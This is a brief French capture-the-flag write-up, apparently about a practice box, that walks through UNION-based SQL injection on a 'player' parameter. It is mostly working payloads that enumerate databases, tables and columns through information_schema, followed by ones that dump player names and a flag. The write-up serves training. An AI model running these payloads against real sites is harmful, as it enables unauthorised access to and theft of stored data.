SQLI (UNION Injection) - Pentesting Web

Nous interceptons la requête avec Burp Suite et altérons la variable player :

jordan' union select database()-- -

Le nom de la base de données est november.

Pour lister toutes les bases de données :

jordan' union select group_concat(schema_name) from information_schema.schemata-- -

Résultat : mysql,information_schema,performance_schema,sys, november

Lister les tables de november :

jordan' union select group_concat(table_name) from information_schema.tables where table_schema='november'-- -

Lister les colonnes de la table players :

jordan' union select group_concat(column_name) from information_schema.columns where table_schema='november' and table_name='players' -- -

Colonnes trouvées : player

Extraction des Données Utilisateur

jordan' union select group_concat(player,':') from players-- -

Players trouvées : ippsec,celesian,big0us,luska,tinyboy

Extraction du flag :

jordan' union select group_concat(column_name) from information_schema.columns where table_schema='november' and table_name='flag' -- -

jordan' union select group_concat(one,':') from flag-- -

Mis à jour il y a 1 an